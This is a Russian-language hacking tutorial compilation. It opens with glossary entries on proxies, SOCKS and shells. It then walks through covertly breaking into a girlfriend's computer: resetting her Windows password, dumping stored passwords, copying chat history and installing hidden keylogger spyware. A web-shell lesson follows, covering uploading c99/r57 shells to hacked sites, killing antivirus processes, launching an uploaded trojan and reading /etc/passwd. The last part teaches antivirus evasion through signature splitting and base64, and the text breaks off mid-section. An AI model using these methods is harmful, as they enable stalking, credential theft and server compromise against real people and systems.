6. Прокси-сервер (от англ. proxy — «представитель, уполномоченный») — служба в компьютерных сетях, позволяющая клиентам выполнять косвенные запросы к другим сетевым службам. Сначала клиент подключается к прокси-серверу и запрашивает какой-либо ресурс (например, e-mail), расположенный на другом сервере. Затем прокси-сервер либо подключается к указанному серверу и получает ресурс у него, либо возвращает ресурс из собственного кеша (в случаях, если прокси имеет свой кеш). В некоторых случаях запрос клиента или ответ сервера может быть изменён прокси-сервером в определённых целях. Также прокси-сервер позволяет защищать клиентский компьютер от некоторых сетевых атак.
7. SOCKS — сетевой протокол, который позволяет клиент-серверным приложениям прозрачно использовать сервисы за межсетевыми экранами (фаерволлами). SOCKS — это сокращение от «SOCKetS» (сокеты, гнёзда). Клиенты за межсетевым экраном, нуждающиеся в доступе к внешним серверам, вместо этого могут соединяться с SOCKS прокси сервером. Такой прокси сервер контролирует права клиента для доступа к внешним ресурсам и передаёт запрос к серверу. SOCKS может использоваться и противоположным способом, разрешая внешним клиентам соединяться с серверами за межсетевым экраном (брандмауэром). В отличие от HTTP прокси серверов, SOCKS передаёт все данные от клиента, ничего не добавляя от себя, то есть с точки зрения конечного сервера, SOCKS прокси является обычным клиентом. SOCKS более универсален — не зависит от конкретных протоколов уровня приложений (7-го уровня модели OSI) и базируется на стандарте TCP/IP - протоколе 4-го уровня. Зато HTTP прокси кэширует данные и может более тщательно фильтровать содержимое передаваемых данных. Этот протокол был разработан Дэвидом Кобласом (David Koblas), системным администратором MIPS Computer Systems. После того, как в 1992 году MIPS вошла в состав Silicon Graphics (SGI), Коблас сделал доклад о SOCKS на Симпозиуме по Безопасности Usenix (Usenix Security Symposium), и SOCKS стал публично доступным. Протокол был расширен до четвёртой версии Ин-Да Ли (Ying-Da Lee) из NEC Systems Laboratory.
8. Shell (командный процессор) - интерпретатор команд, командный язык, процессор командного языка ОС UNIX и ее разновидностей; системная программа, принимающая и исполняющая команды и командные строки с терминала и из командного файла; программа, предоставляющая интерфейс, с которым работают пользователи UNIX-систем.
9.
здравствуй,дружок!!!сейчас я тебе расскажу сказочку...
А точнее научу делать несколько вещей пока твоя подружка или дружок отлучились от компьютера и по неосоторожности оставили тебя рядом с ним.кто то возмутиться что лазить в чужом компьютере это нехорошо и не этично.
я полностью согласен.но такое желание часто меня настигает в самый неподходящий момент.а точнее,когда моя девушка остовляет меня наедине с ее компьютером;))))))
итак у нас есть час времени и доступ к компьютеру интересующего нас человека.следов оставлять не хочеться и что то устанавливать на машину мы не хотим.значит все программы которые мы будем использовать должны быть максимально легкими и работать без инсталяции на компьютер жертвы.сейчас у каждого человека в кармане есть флешка.у тебя тоже есть??умничка!!!вот ее мы и будем использовать.я вообще советую залить на нее джентельменский набор и носить их всегда с собой.лично я так и поступил.никогда не знаешь что когда пригодиться.продолжаем взлом..
Пока владельца нет,мы воровато оглядываемся и включаем компьютер.
у многих на входе стоит пароль.но нас ведь так просто не остановить!!!
для нас уже заготовленна на флешке программа CIA Commander.заходим в БИОС и ставим загрузку с флешки.запускаете CIA выбираем каталог с виндой пользователя и обнуляем его пароль.затем можно назначить новый.после всех нехороших манипуляци,когда все сделаем что хотели мы снова обнулим пароль и пользователь решить что "винда глюкнула и стерся пароль!!!"кому как нравиться .перезагружаемся и теперь зная пароль входим.))))
теперь можно запустить программу для востановления удаленных файлов.иногда можно найти уже удаленные но такие интересные файлы))))для наших целей я рекомендую использовать программу Encopy.она достаточно маленькая и работает напрямую с флешки без установки.
пока Encopy восстанавливает мусор из корзины мы займемся паролями.ведь мы хотим знать все.для слива паролей у меня на флешке стоит программа Multi_Password_Recovery.она маленькая на русском языке и может воровать пароли .запускаем ее.ждем пару секунд пока она соберет пароли потом их сохраняем на флешке.чтобы потом неспеша посмотреть на каких форумах зарегестрирован наш человек что пишут ему в контактеи тому подобное)))
есле у человека есть QIP,то идем C:Program Files\QIP\Users\номер\History и получаем доступ ко всей переписке в асе.она копируеться на флешку.увлекательное чтиво!!!уж мне поверьте))))))
в браузере смотрим историю и закладки.тоже интересно бывает узнать где и что читает человек.
теперь я рекомендуюю оставшееся время посвятить на установку шпионской программы КГБ.с ней вы разберетесь без труда.данная программа может работать в видимом и невидимом режиме.умеет делать скриншоты .счтивать нажатие клавиш и отправлять отчеты.это тем ценно что может в дальнейшем мы не сможем подобраться к компу жертвы.она полностью на русском языке.
наш час истек.теперь мы можем неспеша почитать переписку по асе.имея пароли можем читать почту и посещать страничку в контакте.наша программка КГБ будет нас радовать своимим отчетами и яркими скриншотами.
всем удачной охоты!!!
ссылки на программы: CIA Commander
Encopy
Multi_Password_Recovery
KGB_Spy
Можно пропустить.
_______________________________________________________________
Я рад снова видеть , читать ваши сообщения =)
И я решил , что юбилейный урок (Новогодний) должен быть особенный...
Мне очень хотелось бы его сделать таковым... и в этом юбилейном уроке
я решил написать вам о...
_______________________________________________________________
Урок 15.
Shell
Shell code - (Шелл код)это код который может управлять(отдавать команды) удалённой машиной (компьютером) через командную строку.
Ох как много накрученных слов....но это на первый взгляд....на самом деле всё гораздо проще.....как только вы увидите что это такое.....
Я достал свой маленький архив Шеллов.... для того , чтобы вы посмотрели на практике что это такое....
Скачать можно тут : http://narod.ru/disk/4715943000/shells (copy%203).rar.html
В этом архиве находится 5 разных шеллов , но функции у них почти одни и те же....просто кому какой удобнее)))
Функционал у всех шеллов тоже особо не отличается....но в некоторых больше функций в некоторых меньше....
Перейдём к практике.
Если вы читали мои предыдущие уроки , то у вас уже должен быть установлен ваш локальный сервер....тоесть "localhost", он нам понадобится для того чтобы экспериментировать....
1) Разархивируйте архив с шеллами и у вас появится папка "shells" перенесите папку на ваш локальный сервер...
чтобы путь к папке shells был такой.... localhost/shells
(Вообще это не обязательно...но мы это делаем для того чтобы в дальнейшем вы не растерялись)
2)Теперь давайте откроем Браузер и введём туда localhost/shells/c99madshell.php
И перед вами появится шелл! теперь давайте рассмотрим его по подробнее
Вот так выглядит "Головная" часть шелла....которая показывает всю информацию о Сервере(где расположен шелл).
----------------------------------------------------------------------------
Software: Apache/2.0.59 (Win32) [link=http://localhost/shells/c99madshell.php#]http://localhost/shells/c99madshell.php#[/link]PHP/5.1.6 //Версия Apache и PHP
uname -a: Windows NT XAKEP9009 5.1 build 2600 // Имя компьютера и Операционная система.
Хакер9009 //Имя пользователя
Safe-mode: OFF (not secure) //Это настройки сервера (включён ли безопасный режим или нет)
T:\home\localhost\shells\ drwxrwxrwx // Дерриктория где расположен шелл ( полный путь)
Free 22.56 GB of 93.16 GB (24.22%) //Свободное место на Сервере(на кмпе жосткий диск)
Detected drives: [ a ] [ c ][ d ][ e ][ t ] //Локальные(жосткие диски) и не локальные(флешки) диски.
Как вы заметили если на них нажать , то вы можете передвигаться по этим деррикториям\дискам.... скажем диска "C:\\"
----------------------------------------------------------------------------
Как видите ничего сложного....поехали дальше...(а если сложности возникли...то просто попробуйте на практике и я уверен вы всё поймёте!)
3) Listing folder (7 files and 1 folders): //Какие файлы и папки расположены в текущей директории.....
//(почему в текущей? потому как вы можете передвигаться по директориям)
Ниже идут столбцы:
Name - Имя файла или папки. ( Запомните ".." двоеточие означает переход на каталог выше.
Пример: Были "C:\\Programm files" Пишем: "С:\\Programm files\.." оказываемся "С:\\" .А одна точка означает текущий каталог.
Size - Размер или тип(папка - DIR или ссылка - LINK).
Modify - Когда последний раз модифицировали этот файл или папку. (или создали этот файл \ папку ).
Perms - Права на запись(w) или чтение(r). Bсё вместе(и запись и чтение будет rw).
Action - Действия и здесь есть три пункта
I - information (информация о файлах и папках)
E - Edit ( редактировать файлы и папки)
D - Download (Скачивание файлов)
Чуть ниже расположено поле
Select All - выделить всё (для того чтобы проделать какие то действия)
UnSelect All - снять выделении.
With Selected - это поле означает какие действия будем проделывать с файлами которые выделены....Там есть несколько вариантов....
Delete - удалить
Сut - вырезать
Copy - копировать
Change-mode - изменить права на запись и чтение.
Так же если вы будете копировать - вырезать....у вас появится кнопка Paset - вставить....(переходите в любую директорию ...жмёте Paste и тот файл который вы копировали\вырезали...вставиться именно в ту директорию....
4) Сommand Execute
Выполнение команд....
Эта часть Шелла работает полностью с командной строкой....
И тут то мы вспоминаем всемирный вопрос....зачем нам знать Unix для взлома серверов?
А вот зачем....
Попробуйте набрать в поле Enter:
ls
Что вы увидите в поле...
Result of execution this command: // Результат от выполненной команды...
А вот именно! ничего....
А попробуйте набрать вот эту команду:
DIR
Вы увидите что то вроде этого
-----------------------------------------------------
Содержимое папки T:\home\localhost\shells
31.12.2008 14:47 <DIR> .
31.12.2008 14:47 <DIR> ..
24.12.2008 21:47 44 283 c99madshell.php
31.12.2008 14:48 <DIR> clon
25.03.2004 00:55 4 884 KA_uShell.php
04.03.2004 17:05 15 431 r57shell.php
23.10.2003 03:22 91 159 remview.php
18.10.2003 21:15 15 965 result.php
10.12.2003 21:49 208 538 shell.php
31.08.2008 20:55 12 461 wxshell.php
7 файлов 392 721 байт
3 папок 24 223 674 368 байт свободно
-----------------------------------------------------
А это две одинаковые команды...только одна исполняется в Unix системах .... а другая в Windows....
Теперь представьте у вас есть доступ к командной строке где стоит Fedora 9 .... а вы не знаете ни одной команды....вот досада то....=) соответственно ничего вы сделать с этим "даром" не сможете....
Поэтому не пренебрегайте и самое главное не бойтесь командной строки...она вам не раз поможет!
Поехали дальше....
Поле Make DIR означает создание папки Пример: T:\home\localhost\shells\lol //Создастся папка с именем "lol"
Make file означает создание фала. T:\home\localhost\shells\help.php //Создастся файл (php)
Search искать файл. // Честно говоря плохо работает =-)
Upload загрузить файл на сервер. (в текущую директорию)
GoDIR Прописываем директорию в которую мы хотим пройти....
Go File (Открыть\Скачать файл)
Select Показывает открытые порты у сервака....
//Так же посмотрите SQL и Tools Первое для подключения к Базе данных на сервере...а второе это открытие портов....
Основной функционал мы рассмотрели.....
Теперь давайте рассмотрим для чего нам этот шелл нужен.....
Ситуация...мы получили доступ к админке на любом форуме\сайте...неважно....главное , что мы можем залить Shell
Залили его...и теперь (в зависимости от расставленных прав) мы получаем полноценный доступ к серверу!
Почему я выделил слово Сервер....потому , что на сервере как правило расположен не один сайт.....
А значит...сломав один сайт мы получаем доступ ко всем сайтам расположенных на этом сервере....
Посмотреть Какие сайты расположены на сервере можно тут http://madnet.name/tools/madss/
Теперь имея шелл мы можем пройтись по директориям и отредактировать index (главная страница)
Так же мы можем протроянить этот сервак убив несколько процессов(допустим антивирусы)
Первым делом узнаём процессы(выполняемые на серваке) tasklist почему то у меня в c99madshell.php не сработал....просто вылетел)))
но зато сработал в r57shell.php
(еще одна разновидность шелла хочу заметить...этот шелл старичок и его вы должны знать как никакой другой...хотя бы ради приличия, так что ознакомьтесь с ним...)
После чего зная PID (номер процесса) мы можем завершить его ...набрав команду
taskkill /PID 4444 /T где 4444 это номер процесса который мы хотим завершить.... "/T" мы пишем для того...чтобы завершить ВСЕдочерние процессы связанные с этим.
Следующий этап будет залитие трояна на сервер и запуск..делается это очень легко....
В Upload выбираем программу (троян) который мы хотим запустить.....
Качаем её на сервер....
После чего выполняем такую команду....
Start troian.exe где troian.exe это залитый вами троян....
_______________________________________________
Вот и всё сервер мы протроянили....
Еще один из моих любимых Shell кодов является remview.php
Легче этого шелаа я вообще не видел....
Если вы нажмёте на картинку "Молоточек с папкой" , а по другому и не скажешь....
То вы зайдёте в ту часть...где можно отдавать команды....
Shell commands Аналог Сommand Execute // это там где отдаются команды командной строке.
Не пугайтесь увидев это :
#example (remove comments '#'):
#cat /etc/passwd;
#ps -ax
#uname -a
Это просто приведены примеры....
Так же тут есть функция кодирования в разные кодировки....
Universal convert
Вообщем все остальные шеллы очень похожи....если не внешне ....то названиями полей и теперь вы сможете самостоятельно определить к чему какое поле относится...
____________________________________________________________________________________
Но как вы заметили (если у вас стоят антивирусы) то вы даже не сможете залить shell... так как он распознаётся как троян....
и сразу блокируется.....
поэтому давайте поговорим о криптографии...
Сам себе криптор.
Я хочу рассказать вам о основах криптографии....
Опять же...ничего сложного здесь нет...мне казалось криптуют только самые крутые хакеры....познав Perl я понял , что это не так =)
Криптовать может каждый....и я вам это докажу...правда сделаю огаворку...разговор будет весить больше про WEB , чем про программы.
Для того , чтобы понять как криптовать...нам нужно понять как работают антивирусы.
Антивирусы работают по принципу сравнения сигнатур.
Пример: В базе данных антивируса хранится код который является вредоносной программой.(по его мнению)
допустим это будет php код....
<?
echo("I am troi!");
?>
Тогда нам надо обмануть антивирус....и заменить этот код на его синоним...
<?
print("I am troi!");
?>
Это один из способов....(замена на синоним)
Но....для того , чтобы заменять на синоним....нам нужно определить какой именно кусок кода является вирусом\трояном
(по мнению антивируса)
И я это делаю так....
Берём
r57shell.php и разбиваем на несколько кусочков....а именно...
от <? до сюда ?>.
Тоесть разбиваем на части....
Пример:У нас есть файл с содержимым
---------------------------------------
<?
echo("this is troi");
?>
<bоdу>
<h1>LOL</h1>
</bоdу>
<?
$i = 10;
echo("$i");
?>
----------------------------------------
Разбиваем его на несколько кусков....
1)
<?
echo("this is troi");
?>
2)
<bоdу>
<h1>LOL</h1>
</bоdу>
3)
<?
$i = 10;
echo("$i");
?>
После чего сканируем на наличие вирусов каждый из них.....находим вредоносную часть...и заменяем её на синоним....
Или если эта часть кода вам вообще не нужна ....вы можете её удалить....
Что кстати подходит к нашему случаю....с r57shell.php
Оказалось...что антивирус(по крайней мере мой) реагирует на код который распложен между
<!-- don't delete this plz --> я полазил по интернету....что означает этот Джава скрипт код....и узнал что это просто напросто счётчик....=-)
Который нам совсем не нужен)))
Удаляем его....и еще раз проверяем на наличие вирусов...и более это не вредоносная программа\скрипт =-)
Поздравляю! это ваш первый опыт в криптографии (я уверен не последний).
Бывают случаи когда антивирусы ищут не только по Коду....но и по комментариям!
Поэтому Удаляйте все лишние комментарии....(Но из уважения к автору ,который написал скрипт...оставляйте его Ник.)
Так мы и поступим с нашим следующим shell`ом remview.php
Удаляем все комментарии-описания...и получаем еще один не "палящийся" шелл код.
Так же бывают случаи ,когда синонима просто нет!
В этом случае к нам приходит на помощь base64
Это гениальная вещь для того , чтобы закриптовать нужный нам код...
Допустим у нас есть..
----------------------------
<?
$x=10;
$y=12;
$z=$x+$y;
echo("$x+$y=$z");
?>
----------------------------
нам нужно сделать так, чтобы антивирус и писку не издал)))
тогда делаем так....
---------------------------------------------------------------------------------
окуратно так как проследуя по этой ссылке вы можете заразится хакерством а его не лечат а только залечивают
Я решил маскировать зловреда под СМС-браузер (ничего не напоминает ?) 
